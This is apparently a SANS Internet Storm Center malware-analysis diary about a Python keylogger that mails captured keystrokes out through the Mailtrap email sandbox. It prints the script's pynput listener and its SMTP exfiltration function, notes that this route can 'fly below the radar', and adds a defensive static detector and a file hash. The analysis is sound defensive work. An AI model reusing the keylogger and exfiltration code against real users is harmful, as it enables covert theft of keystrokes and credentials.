Python Keylogger Using, (Sat, Dec 23rd)

I found another Python keylogger… This is pretty common because Python has plenty of modules to implement this technique in a few lines of code:

from pynput import keyboard
from pynput.keyboard import Listener

keyboard_listener = keyboard.Listener(on_press=self.save_data)
with keyboard_listener:

This is not the most interesting part of the malicious script. When data (key presses) are collected, they must be exfiltrated to the attacker’s C2. These days, Discord is very popular. I also found many abused Google Mail accounts.

But, in this case, the attacker used another popular online service: Mailtrap[1]. This service is “an email sandbox to inspect and debug emails in staging, dev, and QA environments before sending them to recipients in production”. You may register a free account and get an environment to receive emails for free! Mailtrap will provide an authenticated SMTP server to which the emails are sent. Here is the code from the malicious script:

def send_mail(self, email, password, message):
    sender = "Private Person <[email protected]>"
    receiver = "A Test User <[email protected]>"
    m = f"""
Subject: main Mailtrap
To: {receiver}
From: {sender}

Keylogger by aydinnyunusn"""

    m += message
    with smtplib.SMTP("", 2525) as server:
        server.login(email, password)
        server.sendmail(sender, receiver, message)

Mailtrap accepts emails on the following ports: 25, 465, 587 or 2525. Strangely, the script uses the last one, even though there are chances that it will be blocked in corporate environments. Otherwise, it’s a nice way to fly below the radar…
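For triage, the combination described above (a pynput keyboard listener plus an smtplib submission on one of the listed ports) can be flagged statically without running the script. The following is an added example, not code from the diary or from the malicious script; the function name triage, the constructed sample and the placeholder host smtp.example.invalid are assumptions.

```python
import ast

# SMTP submission ports the diary lists for the abused service.
SMTP_PORTS = {25, 465, 587, 2525}

def triage(source: str) -> dict:
    """Statically flag keyboard capture combined with SMTP submission."""
    tree = ast.parse(source)  # parse only; the sample is never executed
    imports, hooks, smtp_calls = set(), [], []
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            imports.update(a.name.split(".")[0] for a in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            imports.add(node.module.split(".")[0])
        elif isinstance(node, ast.Call):
            name = ast.unparse(node.func)
            kwargs = {k.arg for k in node.keywords}
            if name.endswith("Listener") and kwargs & {"on_press", "on_release"}:
                hooks.append(name)
            elif name.split(".")[-1] in {"SMTP", "SMTP_SSL"}:
                port = None  # stays None when the port is not a literal
                if len(node.args) > 1 and isinstance(node.args[1], ast.Constant):
                    port = node.args[1].value
                for k in node.keywords:
                    if k.arg == "port" and isinstance(k.value, ast.Constant):
                        port = k.value.value
                smtp_calls.append(port)
    captures = "pynput" in imports and bool(hooks)
    mails = "smtplib" in imports and bool(smtp_calls)
    return {
        "keyboard_hook": captures,
        "smtp_ports": smtp_calls,
        "suspicious": captures and mails,
        "known_port": any(p in SMTP_PORTS for p in smtp_calls),
    }

# Constructed sample modelled on the excerpts above; the host is a placeholder.
SAMPLE = '''
import smtplib
from pynput import keyboard
class K:
    def run(self):
        keyboard_listener = keyboard.Listener(on_press=self.save_data)
    def send_mail(self, email, password, message):
        with smtplib.SMTP("smtp.example.invalid", 2525) as server:
            server.login(email, password)
'''
if __name__ == "__main__":
    print(triage(SAMPLE))
```

A hit is a reason to look closer, not a verdict: legitimate automation also imports smtplib, so the flag is only raised when the keyboard hook is present as well.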

Conclusion: another free online service (ab)used by attackers!

Script SHA256: 9f4351340ec0a5f50c5a1a45a6ee6d2ffc66750ad2a2799da82ffac2e00cb88d, with a VT score of 8/61[2]


Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.